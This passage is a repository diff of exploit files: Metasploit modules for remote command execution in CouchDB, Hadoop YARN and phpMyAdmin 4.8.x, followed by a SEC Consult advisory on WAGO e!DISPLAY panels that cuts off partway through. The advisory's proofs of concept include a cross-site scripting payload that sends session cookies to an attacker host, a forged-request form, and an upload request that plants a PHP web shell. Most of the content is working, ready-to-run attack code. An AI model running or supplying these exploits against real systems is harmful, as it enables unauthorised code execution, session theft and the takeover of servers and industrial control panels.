vprint_bad("#{peer} - Cannot parse the response, seems like it's not CouchDB.")
|
||||
return false
|
||||
end
|
||||
|
||||
@version = res_json['version'] if res_json['version']
|
||||
return true
|
||||
end
|
||||
|
||||
vprint_warning("#{peer} - Version not found")
|
||||
return true
|
||||
end
|
||||
|
||||
def send_payload(version)
|
||||
vprint_status("#{peer} - CouchDB version is #{version}") if version
|
||||
|
||||
version = Gem::Version.new(@version)
|
||||
if version.version.empty?
|
||||
vprint_warning("#{peer} - Cannot retrieve the version of CouchDB.")
|
||||
# if target set Automatic, exploit failed.
|
||||
if target == targets[0]
|
||||
fail_with(Failure::NoTarget, "#{peer} - Couldn't retrieve the version automaticly, set the target manually and try again.")
|
||||
elsif target == targets[1]
|
||||
payload1
|
||||
elsif target == targets[2]
|
||||
payload2
|
||||
end
|
||||
elsif version < Gem::Version.new('1.7.0')
|
||||
payload1
|
||||
elsif version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0'))
|
||||
payload2
|
||||
elsif version >= Gem::Version.new('1.7.0') || Gem::Version.new('2.1.0')
|
||||
fail_with(Failure::NotVulnerable, "#{peer} - The target is not vulnerable.")
|
||||
end
|
||||
end
|
||||
|
||||
# Exploit with multi requests
|
||||
# payload1 is for the version of couchdb below 1.7.0
|
||||
def payload1
|
||||
rand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12)
|
||||
rand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12)
|
||||
rand_db = Rex::Text.rand_text_alpha_lower(4..12)
|
||||
rand_doc = Rex::Text.rand_text_alpha_lower(4..12)
|
||||
rand_hex = Rex::Text.rand_text_hex(32)
|
||||
rand_file = "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}"
|
||||
|
||||
register_file_for_cleanup(rand_file)
|
||||
|
||||
send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, "/_config/query_servers/#{rand_cmd1}"),
|
||||
'method' => 'PUT',
|
||||
'authorization' => @auth,
|
||||
'data' => %("echo '#{@cmdstager}' > #{rand_file}")
|
||||
)
|
||||
|
||||
send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, "/#{rand_db}"),
|
||||
'method' => 'PUT',
|
||||
'authorization' => @auth
|
||||
)
|
||||
|
||||
send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/#{rand_doc}"),
|
||||
'method' => 'PUT',
|
||||
'authorization' => @auth,
|
||||
'data' => %({"_id": "#{rand_hex}"})
|
||||
)
|
||||
|
||||
send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/_temp_view?limit=20"),
|
||||
'method' => 'POST',
|
||||
'authorization' => @auth,
|
||||
'ctype' => 'application/json',
|
||||
'data' => %({"language":"#{rand_cmd1}","map":""})
|
||||
)
|
||||
|
||||
send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, "/_config/query_servers/#{rand_cmd2}"),
|
||||
'method' => 'PUT',
|
||||
'authorization' => @auth,
|
||||
'data' => %("/bin/sh #{rand_file}")
|
||||
)
|
||||
|
||||
send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/_temp_view?limit=20"),
|
||||
'method' => 'POST',
|
||||
'authorization' => @auth,
|
||||
'ctype' => 'application/json',
|
||||
'data' => %({"language":"#{rand_cmd2}","map":""})
|
||||
)
|
||||
end
|
||||
|
||||
# payload2 is for the version of couchdb below 2.1.1
|
||||
def payload2
|
||||
rand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12)
|
||||
rand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12)
|
||||
rand_db = Rex::Text.rand_text_alpha_lower(4..12)
|
||||
rand_doc = Rex::Text.rand_text_alpha_lower(4..12)
|
||||
rand_tmp = Rex::Text.rand_text_alpha_lower(4..12)
|
||||
rand_hex = Rex::Text.rand_text_hex(32)
|
||||
rand_file = "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}"
|
||||
|
||||
register_file_for_cleanup(rand_file)
|
||||
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, "/_membership"),
|
||||
'method' => 'GET',
|
||||
'authorization' => @auth
|
||||
)
|
||||
|
||||
node = res.get_json_document['all_nodes'][0]
|
||||
|
||||
send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, "/_node/#{node}/_config/query_servers/#{rand_cmd1}"),
|
||||
'method' => 'PUT',
|
||||
'authorization' => @auth,
|
||||
'data' => %("echo '#{@cmdstager}' > #{rand_file}")
|
||||
)
|
||||
|
||||
send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, "/#{rand_db}"),
|
||||
'method' => 'PUT',
|
||||
'authorization' => @auth
|
||||
)
|
||||
|
||||
send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/#{rand_doc}"),
|
||||
'method' => 'PUT',
|
||||
'authorization' => @auth,
|
||||
'data' => %({"_id": "#{rand_hex}"})
|
||||
)
|
||||
|
||||
send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/_design/#{rand_tmp}"),
|
||||
'method' => 'PUT',
|
||||
'authorization' => @auth,
|
||||
'ctype' => 'application/json',
|
||||
'data' => %({"_id":"_design/#{rand_tmp}","views":{"#{rand_db}":{"map":""} },"language":"#{rand_cmd1}"})
|
||||
)
|
||||
|
||||
send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, "/_node/#{node}/_config/query_servers/#{rand_cmd2}"),
|
||||
'method' => 'PUT',
|
||||
'authorization' => @auth,
|
||||
'data' => %("/bin/sh #{rand_file}")
|
||||
)
|
||||
|
||||
send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/_design/#{rand_tmp}"),
|
||||
'method' => 'PUT',
|
||||
'authorization' => @auth,
|
||||
'ctype' => 'application/json',
|
||||
'data' => %({"_id":"_design/#{rand_tmp}","views":{"#{rand_db}":{"map":""} },"language":"#{rand_cmd2}"})
|
||||
)
|
||||
end
|
||||
|
||||
def cmdstager_path
|
||||
@cmdstager_path ||=
|
||||
"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8)}"
|
||||
end
|
||||
|
||||
end
|
92
exploits/linux/remote/45025.rb
Executable file
92
exploits/linux/remote/45025.rb
Executable file
|
@ -0,0 +1,92 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::CmdStager
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Hadoop YARN ResourceManager Unauthenticated Command Execution',
|
||||
'Description' => %q{
|
||||
This module exploits an unauthenticated command execution vulnerability in Apache Hadoop through ResourceManager REST API.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'cbmixx', # Proof of concept
|
||||
'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf'],
|
||||
['URL', 'https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn']
|
||||
],
|
||||
'Platform' => 'linux',
|
||||
'Arch' => [ARCH_X86, ARCH_X64],
|
||||
'Targets' =>
|
||||
[
|
||||
['Automatic', {}]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Oct 19 2016',
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
register_options([Opt::RPORT(8088)])
|
||||
end
|
||||
|
||||
def check
|
||||
begin
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
|
||||
'method' => 'POST'
|
||||
)
|
||||
rescue Rex::ConnectionError
|
||||
vprint_error("#{peer} - Connection failed")
|
||||
return CheckCode::Unknown
|
||||
end
|
||||
|
||||
if res && res.code == 200 && res.body.include?('application-id')
|
||||
return CheckCode::Detected
|
||||
end
|
||||
|
||||
CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status('Sending Command')
|
||||
execute_cmdstager
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts = {})
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
|
||||
'method' => 'POST'
|
||||
)
|
||||
|
||||
app_id = res.get_json_document['application-id']
|
||||
|
||||
post = {
|
||||
'application-id' => app_id,
|
||||
'application-name' => Rex::Text.rand_text_alpha_lower(4..12),
|
||||
'application-type' => 'YARN',
|
||||
'am-container-spec' => {
|
||||
'commands' => {'command' => cmd.to_s}
|
||||
}
|
||||
}
|
||||
|
||||
send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps'),
|
||||
'method' => 'POST',
|
||||
'ctype' => 'application/json',
|
||||
'data' => post.to_json
|
||||
)
|
||||
end
|
||||
|
||||
end
|
234
exploits/php/remote/45020.rb
Executable file
234
exploits/php/remote/45020.rb
Executable file
|
@ -0,0 +1,234 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = GoodRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'phpMyAdmin Authenticated Remote Code Execution',
|
||||
'Description' => %q{
|
||||
phpMyAdmin v4.8.0 and v4.8.1 are vulnerable to local file inclusion,
|
||||
which can be exploited post-authentication to execute PHP code by
|
||||
application. The module has been tested with phpMyAdmin v4.8.1.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'ChaMd5', # Vulnerability discovery and PoC
|
||||
'Henry Huang', # Vulnerability discovery and PoC
|
||||
'Jacob Robles' # Metasploit Module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'BID', '104532' ],
|
||||
[ 'CVE', '2018-12613' ],
|
||||
[ 'CWE', '661' ],
|
||||
[ 'URL', 'https://www.phpmyadmin.net/security/PMASA-2018-4/' ],
|
||||
[ 'URL', 'https://www.secpulse.com/archives/72817.html' ],
|
||||
[ 'URL', 'https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-Authorited-CLI-to-RCE/' ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Platform' => [ 'php' ],
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', {} ],
|
||||
[ 'Windows', {} ],
|
||||
[ 'Linux', {} ]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Jun 19 2018'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [ true, "Base phpMyAdmin directory path", '/phpmyadmin/']),
|
||||
OptString.new('USERNAME', [ true, "Username to authenticate with", 'root']),
|
||||
OptString.new('PASSWORD', [ false, "Password to authenticate with", ''])
|
||||
])
|
||||
end
|
||||
|
||||
def check
|
||||
begin
|
||||
res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path) })
|
||||
rescue
|
||||
vprint_error("#{peer} - Unable to connect to server")
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
if res.nil? || res.code != 200
|
||||
vprint_error("#{peer} - Unable to query /js/messages.php")
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
# v4.8.0 || 4.8.1 phpMyAdmin
|
||||
if res.body =~ /PMA_VERSION:"(\d+\.\d+\.\d+)"/
|
||||
version = Gem::Version.new($1)
|
||||
vprint_status("#{peer} - phpMyAdmin version: #{version}")
|
||||
|
||||
if version == Gem::Version.new('4.8.0') || version == Gem::Version.new('4.8.1')
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
def query(uri, qstring, cookies, token)
|
||||
send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(uri, 'import.php'),
|
||||
'cookie' => cookies,
|
||||
'vars_post' => Hash[{
|
||||
'sql_query' => qstring,
|
||||
'db' => '',
|
||||
'table' => '',
|
||||
'token' => token
|
||||
}.to_a.shuffle]
|
||||
})
|
||||
end
|
||||
|
||||
def lfi(uri, data_path, cookies, token)
|
||||
send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(uri, 'index.php'),
|
||||
'cookie' => cookies,
|
||||
'encode_params' => false,
|
||||
'vars_get' => {
|
||||
'target' => "db_sql.php%253f#{'/..'*16}#{data_path}"
|
||||
}
|
||||
})
|
||||
end
|
||||
|
||||
def exploit
|
||||
unless check == Exploit::CheckCode::Appears
|
||||
fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
|
||||
end
|
||||
|
||||
uri = target_uri.path
|
||||
vprint_status("#{peer} - Grabbing CSRF token...")
|
||||
|
||||
response = send_request_cgi({'uri' => uri})
|
||||
|
||||
if response.nil?
|
||||
fail_with(Failure::NotFound, "#{peer} - Failed to retrieve webpage grabbing CSRF token")
|
||||
elsif response.body !~ /token"\s*value="(.*?)"/
|
||||
fail_with(Failure::NotFound, "#{peer} - Couldn't find token. Is URI set correctly?")
|
||||
end
|
||||
token = Rex::Text.html_decode($1)
|
||||
|
||||
if target.name =~ /Automatic/
|
||||
/\((?<srv>Win.*)?\)/ =~ response.headers['Server']
|
||||
mytarget = srv.nil? ? 'Linux' : 'Windows'
|
||||
else
|
||||
mytarget = target.name
|
||||
end
|
||||
|
||||
vprint_status("#{peer} - Identified #{mytarget} target")
|
||||
|
||||
#Pull out the last two cookies
|
||||
cookies = response.get_cookies
|
||||
cookies = cookies.split[-2..-1].join(' ')
|
||||
|
||||
vprint_status("#{peer} - Retrieved token #{token}")
|
||||
vprint_status("#{peer} - Retrieved cookies #{cookies}")
|
||||
vprint_status("#{peer} - Authenticating...")
|
||||
|
||||
login = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(uri, 'index.php'),
|
||||
'cookie' => cookies,
|
||||
'vars_post' => {
|
||||
'token' => token,
|
||||
'pma_username' => datastore['USERNAME'],
|
||||
'pma_password' => datastore['PASSWORD']
|
||||
}
|
||||
})
|
||||
|
||||
if login.nil? || login.code != 302
|
||||
fail_with(Failure::NotFound, "#{peer} - Failed to retrieve webpage")
|
||||
end
|
||||
|
||||
#Ignore the first cookie
|
||||
cookies = login.get_cookies
|
||||
cookies = cookies.split[1..-1].join(' ')
|
||||
vprint_status("#{peer} - Retrieved cookies #{cookies}")
|
||||
|
||||
login_check = send_request_cgi({
|
||||
'uri' => normalize_uri(uri, 'index.php'),
|
||||
'vars_get' => { 'token' => token },
|
||||
'cookie' => cookies
|
||||
})
|
||||
|
||||
if login_check.nil?
|
||||
fail_with(Failure::NotFound, "#{peer} - Failed to retrieve webpage")
|
||||
elsif login_check.body.include? 'Welcome to'
|
||||
fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
|
||||
elsif login_check.body !~ /token"\s*value="(.*?)"/
|
||||
fail_with(Failure::NotFound, "#{peer} - Couldn't find token. Is URI set correctly?")
|
||||
end
|
||||
token = Rex::Text.html_decode($1)
|
||||
|
||||
vprint_status("#{peer} - Authentication successful")
|
||||
|
||||
#Generating strings/payload
|
||||
database = rand_text_alpha_lower(5)
|
||||
table = rand_text_alpha_lower(5)
|
||||
column = rand_text_alpha_lower(5)
|
||||
col_val = "'<?php eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\")); ?>'"
|
||||
|
||||
|
||||
#Preparing sql queries
|
||||
dbsql = "CREATE DATABASE #{database};"
|
||||
tablesql = "CREATE TABLE #{database}.#{table}(#{column} varchar(4096) DEFAULT #{col_val});"
|
||||
dropsql = "DROP DATABASE #{database};"
|
||||
dirsql = 'SHOW VARIABLES WHERE Variable_Name Like "%datadir";'
|
||||
|
||||
#Create database
|
||||
res = query(uri, dbsql, cookies, token)
|
||||
if res.nil? || res.code != 200
|
||||
fail_with(Failure::UnexpectedReply, "#{peer} - Failed to create database")
|
||||
end
|
||||
|
||||
#Create table and column
|
||||
res = query(uri, tablesql, cookies, token)
|
||||
if res.nil? || res.code != 200
|
||||
fail_with(Failure::UnexpectedReply, "#{peer} - Failed to create table")
|
||||
end
|
||||
|
||||
#Find datadir
|
||||
res = query(uri, dirsql, cookies, token)
|
||||
if res.nil? || res.code != 200
|
||||
fail_with(Failure::UnexpectedReply, "#{peer} - Failed to find data directory")
|
||||
end
|
||||
|
||||
unless res.body =~ /^<td data.*?>(.*)?</
|
||||
fail_with(Failure::UnexpectedReply, "#{peer} - Failed to find data directory")
|
||||
end
|
||||
|
||||
#Creating include path
|
||||
if mytarget == 'Windows'
|
||||
#Table file location
|
||||
data_path = $1.gsub(/\\/, '/')
|
||||
data_path = data_path.sub(/^.*?\//, '/')
|
||||
data_path << "#{database}/#{table}.frm"
|
||||
else
|
||||
#Session path location
|
||||
/phpMyAdmin=(?<session_name>.*?);/ =~ cookies
|
||||
data_path = "/var/lib/php/sessions/sess_#{session_name}"
|
||||
end
|
||||
|
||||
res = lfi(uri, data_path, cookies, token)
|
||||
|
||||
#Drop database
|
||||
res = query(uri, dropsql, cookies, token)
|
||||
if res.nil? || res.code != 200
|
||||
print_error("#{peer} - Failed to drop database #{database}. Might drop when your session closes.")
|
||||
end
|
||||
end
|
||||
end
|
325
exploits/php/webapps/45014.txt
Normal file
325
exploits/php/webapps/45014.txt
Normal file
|
@ -0,0 +1,325 @@
|
|||
SEC Consult Vulnerability Lab Security Advisory < 20180711-0 >
|
||||
=======================================================================
|
||||
title: Remote code execution via multiple attack vectors
|
||||
product: WAGO e!DISPLAY 7300T - WP 4.3 480x272 PIO1
|
||||
vulnerable version: FW 01 - 01.01.10(01)
|
||||
fixed version: FW 02
|
||||
CVE number: CVE-2018-12979, CVE-2018-12980, CVE-2018-12981
|
||||
impact: High
|
||||
homepage: https://www.wago.com/
|
||||
found: 2018-04-25
|
||||
by: T. Weber (Office Vienna)
|
||||
SEC Consult Vulnerability Lab
|
||||
|
||||
An integrated part of SEC Consult
|
||||
Europe | Asia | North America
|
||||
|
||||
https://www.sec-consult.com
|
||||
|
||||
=======================================================================
|
||||
|
||||
Vendor description:
|
||||
-------------------
|
||||
"New ideas are the driving force behind our success WAGO is a family-owned
|
||||
company headquartered in Minden, Germany. Independently operating for three
|
||||
generations, WAGO is the global leader of spring pressure electrical
|
||||
interconnect and automation solutions. For more than 60 years, WAGO has
|
||||
developed and produced innovative products for packaging, transportation,
|
||||
process, industrial and building automation markets amongst others. Aside from
|
||||
its innovations in spring pressure connection technology, WAGO has introduced
|
||||
numerous innovations that have revolutionized industry. Further ground-breaking
|
||||
inventions include: the WAGO-I/O-SYSTEM®, TOPJOB S® and WALL-NUTS®."
|
||||
|
||||
Source: http://www.wago.us/wago/
|
||||
|
||||
"For visualization tasks with CODESYS 2 and CODESYS 3: WAGO's new e!DISPLAY
|
||||
7300T Web Panels help you reinforce the quality of your machinery and equipment
|
||||
with a refined design and industry-leading software. Learn more about how the
|
||||
right Web Panels make a difference.
|
||||
|
||||
HMI components are the finishing touch for machines or systems and they have an
|
||||
overwhelming impact on purchase decisions. WAGO offers aesthetically pleasing
|
||||
HMIs that leave a lasting impression and significantly increase both the value
|
||||
and image of your machine or system. WAGO’s e!DISPLAY 7300T Web Panel is
|
||||
available in 4.3'', 5.7'', 7.0'' and 10.1'' display sizes."
|
||||
|
||||
Source:
|
||||
http://www.wago.us/products/components-for-automation/operation-and-monitoring/web-panels-edisplay-7300t/overview/index.jsp
|
||||
|
||||
|
||||
Business recommendation:
|
||||
------------------------
|
||||
HMI displays are widely used in SCADA infrastructures. The link between
|
||||
their administrative (or informational) web interfaces and the users which
|
||||
access these interfaces is critical. The presented attacks demonstrate how
|
||||
simple it is to inject malicious code in order to break the security of this
|
||||
link by exploiting minimal user interaction.
|
||||
|
||||
As a consequence a computer which is used for HMI administration should not
|
||||
provide any possibility to get compromised via malicious script code.
|
||||
|
||||
One possible solution may be e.g.:
|
||||
* Don't allow email clients
|
||||
* Don't provide Internet access at all on the HMI stations
|
||||
|
||||
SEC Consult recommends to immediately apply the available patches from the vendor.
|
||||
A thorough security review should be performed by security professionals to
|
||||
identify further potential security issues.
|
||||
|
||||
|
||||
Vulnerability overview/description:
|
||||
-----------------------------------
|
||||
1) Multiple Reflected POST Cross-Site Scripting (CVE-2018-12981)
|
||||
Reflected cross site scripting vulnerabilities were identified within multiple PHP
|
||||
scripts in the admin interface. The parameter JSON input which is sent to the
|
||||
device is not sanitized sufficiently. An attacker can exploit this
|
||||
vulnerability to execute arbitrary scripts in the context of the attacked user
|
||||
and gain control over the active session.
|
||||
|
||||
This vulnerability is present for authenticated and unauthenticated users!
|
||||
|
||||
|
||||
2) Stored Cross-Site Scripting (CVE-2018-12981)
|
||||
A stored cross-site scripting vulnerability was identified within the
|
||||
"PLC List" which can be configured in the web interface of the e!Display. By
|
||||
storing a payload there, an administrative or guest user can be attacked
|
||||
without tricking them to visit a malicious web site or clicking on an
|
||||
malicious link.
|
||||
|
||||
This vulnerability is only present for authenticated users!
|
||||
|
||||
|
||||
3) Unrestricted File Upload and File Path Manipulation (CVE-2018-12980)
|
||||
Arbitrary files can be uploaded to the system without any check. It is even
|
||||
possible to change the location of the uploaded file on the system. As the
|
||||
web service does not run as privileged user, it is not possible to upload a
|
||||
file directly to the web root but on many other locations on the file system.
|
||||
The normal user 'user' and the administrative user 'admin' can both upload
|
||||
files to the system.
|
||||
|
||||
|
||||
4) Incorrect Default Permissions (CVE-2018-12979)
|
||||
Due to incorrect default permissions a file in the web root can be overwritten
|
||||
by the unprivileged 'www' user. This is the same user which is used in the
|
||||
context of the web server.
|
||||
|
||||
|
||||
5) Remote code execution via multiple attack vectors
|
||||
By stacking vulnerability 1)/2), 3) and 4) with this vulnerability an outside
|
||||
attacker can place a malicious script on the device in order to execute arbitrary
|
||||
commands as 'www'. This can be done by uploading a web shell or a reverse
|
||||
shell.
|
||||
|
||||
|
||||
Proof of concept:
|
||||
-----------------
|
||||
1) Multiple Reflected POST Cross-Site Scripting (CVE-2018-12981)
|
||||
The affected endpoints are:
|
||||
http://<IP-Address>/wbm/configtools.php
|
||||
http://<IP-Address>/wbm/login.php
|
||||
http://<IP-Address>/wbm/receive_upload.php
|
||||
|
||||
The following request is an example for reflected XSS within 'configtools.php':
|
||||
-------------------------------------------------------------------------------
|
||||
POST /wbm/configtools.php HTTP/1.1
|
||||
Host: <IP-Address>
|
||||
Content-type: text/plain
|
||||
[...]
|
||||
|
||||
{"sessionId":"","aDeviceParams":{"0":{"name":"firewall","parameter":["iptables","--get-xml"],"sudo":true,"multiline":true,"timeout":10000},"1":{"name":"firewall","parameter":["firewall","--is-enabled"],"sudo":true,"multiline":true,"timeout":10000,"dataId":"{DoNotParseAsXml}<img
|
||||
src=x onerror=this.src='http://$attacker:8001/?c='+document.cookie>;"}}}
|
||||
-------------------------------------------------------------------------------
|
||||
|
||||
|
||||
Steal the cookie via XSS and send it to http://$attacker:8001?c=<Session-ID>:
|
||||
-------------------------------------------------------------------------------
|
||||
<html>
|
||||
<body>
|
||||
<script>history.pushState('', '', '/')</script>
|
||||
<form action="http://<IP-Address>/wbm/configtools.php" method="POST"
|
||||
enctype="text/plain">
|
||||
<input type="hidden"
|
||||
name="{"sessionId":"","aDeviceParams":{"0":{"name":"firewall","parameter":["iptables","--get-xml"],"sudo":true,"multiline":true,"timeout":10000},"1":{"name":"firewall","parameter":["firewall","--is-enabled"],"sudo":true,"multiline":true,"timeout":10000,"dataId":"{DoNotParseAsXml}<img src"
|
||||
value="x onerror=this.src='http://...:8001/?c='+document.cookie>;"}}}"
|
||||
/>
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
-------------------------------------------------------------------------------
|
||||
|
||||
|
||||
2) Stored Cross-Site Scripting (CVE-2018-12981)
|
||||
To exploit this vulnerability malicious code has to be placed in the "PLC List"
|
||||
by surfing to the endpoint http://<IP-Address>/app/index.html and clicking on
|
||||
the tab "Application->PLC-List". By opening one of the configurable PLCs the
|
||||
name can be changed in the box "Text:" in order to execute arbitrary script-
|
||||
code. For example:
|
||||
<img src=a onerror=alert('SEC_Consult_XSS');alert(document.cookie)>
|
||||
|
||||
The payload can also be placed on the device by using the following POST request:
|
||||
-------------------------------------------------------------------------------
|
||||
POST /wbm/configtools.php HTTP/1.1
|
||||
Host: <IP-Address>
|
||||
[...]
|
||||
|
||||
{"sessionId":"<Valid session-ID>
|
||||
","aDeviceParams":{"0":{"name":"config_plcselect","parameter":[2,"url=https://127.0.0.1:8001","txt=<img
|
||||
src=a
|
||||
onerror=alert('SEC_Consult_XSS');alert(document.cookie)>","vkb=enabled","mon=1"],"sudo":true}}}
|
||||
-------------------------------------------------------------------------------
|
||||
|
||||
|
||||
3) Unrestricted File Upload and File Path Manipulation (CVE-2018-12980)
|
||||
The file path, the file name and the file content can be manipulated in any
|
||||
way. There is no server-side check for malicious files.
|
||||
|
||||
-------------------------------------------------------------------------------
|
||||
POST /wbm/receive_upload.php HTTP/1.1
|
||||
Host: <IP-Address>
|
||||
[...]
|
||||
Content-Type: multipart/form-data;
|
||||
boundary=---------------------------728140389204955163192597293
|
||||
|
||||
-----------------------------728140389204955163192597293
|
||||
Content-Disposition: form-data; name="touchWbm"
|
||||
|
||||
true
|
||||
-----------------------------728140389204955163192597293
|
||||
Content-Disposition: form-data; name="upload_type"
|
||||
|
||||
font
|
||||
-----------------------------728140389204955163192597293
|
||||
Content-Disposition: form-data; name="session_id"
|
||||
|
||||
<Valid session-ID>
|
||||
-----------------------------728140389204955163192597293
|
||||
Content-Disposition: form-data; name="upload_directory"
|
||||
|
||||
/tmp/
|
||||
-----------------------------728140389204955163192597293
|
||||
Content-Disposition: form-data; name="font_file"; filename="any_file.sh"
|
||||
Content-Type: application/x-font-ttf
|
||||
|
||||
any-content #!
|
||||
|
||||
|
||||
-----------------------------728140389204955163192597293--
|
||||
-------------------------------------------------------------------------------
|
||||
|
||||
|
||||
4) Incorrect Default Permissions (CVE-2018-12979)
|
||||
The file 'index.html' is owned by 'www' and can therefore also be overwritten
|
||||
with a web shell.
|
||||
|
||||
www@WAGO_eDisplay:/var/www ls -la
|
||||
drwxr-xr-x 5 root root 488 XXX 99 2018 .
|
||||
drwxr-xr-x 11 root root 824 XXX 99 2018 ..
|
||||
lrwxrwxrwx 1 root root 16 XXX 99 2018 app -> /var/www/WagoWBM
|
||||
-rw-r--r-- 1 www www 345 XXX 99 2018 index.html
|
||||
drwxr-xr-x 7 root root 776 XXX 99 2018 plclist
|
||||
drwxr-xr-x 3 root root 368 XXX 99 2018 WagoWBM
|
||||
drwxr-xr-x 2 root root 688 XXX 99 2018 wbm
|
||||
|
||||
|
||||
5) Remote code execution via multiple attack vectors
|
||||
By uploading a simple PHP shell and overwriting the 'index.html' file located
|
||||
under the web root an attacker can place a web shell which is reachable without
|
||||
any authentication.
|
||||
|
||||
-------------------------------------------------------------------------------
|
||||
POST /wbm/receive_upload.php HTTP/1.1
|
||||
Host: <IP-Address>
|
||||
[...]
|
||||
Content-Type: multipart/form-data;
|
||||
boundary=---------------------------728140389204955163192597293
|
||||
|
||||
-----------------------------728140389204955163192597293
|
||||
Content-Disposition: form-data; name="touchWbm"
|
||||
|
||||
true
|
||||
-----------------------------728140389204955163192597293
|
||||
Content-Disposition: form-data; name="upload_type"
|
||||
|
||||
font
|
||||
-----------------------------728140389204955163192597293
|
||||
Content-Disposition: form-data; name="session_id"
|
||||
|
||||
<Valid session-ID>
|
||||
-----------------------------728140389204955163192597293
|
||||
Content-Disposition: form-data; name="upload_directory"
|
||||
|
||||
/var/www/
|
||||
-----------------------------728140389204955163192597293
|
||||
Content-Disposition: form-data; name="font_file"; filename="index.html"
|
||||
Content-Type: application/x-font-ttf
|
||||
|
||||
<html><body>
|
||||
<form method="GET" name="SEC Consult PoC" action="">
|
||||
<input type="text" name="command"><input type="submit" value="Send"></form>
|
||||
<pre><?php if($_GET['command']){system($_GET['command']);} ?></pre>
|
||||
</body></html>
|
||||
|
||||
|
||||
-----------------------------728140389204955163192597293--
|
||||
-------------------------------------------------------------------------------
|
||||
|
||||
The shell can now be reached via "http://<IP-Address>/index.html". It is also
|
||||
possible to upload a reverse-shell to the system which connects to a computer
|
||||
outside of the actual network.
|
||||
|
||||
|
||||
Vulnerable / tested versions:
|
||||
-----------------------------
|
||||
The following device with the firmware version has been tested:
|
||||
|
||||
* e!DISPLAY 7300T - WP 4.3 480x272 PIO1 - 01.01.10(01)
|
||||
|
||||
According to WAGO the following e!DISPLAY versions are vulnerable:
|
||||
762-3000 FW 01
|
||||
762-3001 FW 01
|
||||
762-3002 FW 01
|
||||
762-3003 FW 01
|
||||
|
||||
|
||||
Vendor contact timeline:
|
||||
------------------------
|
||||
2018-04-30: Sending encrypted advisory to VDE CERT for coordination support
|
||||
(info@cert.vde.com)
|
||||
2018-05-02: Answer from VDE CERT that WAGO will be informed/contacted
|
||||
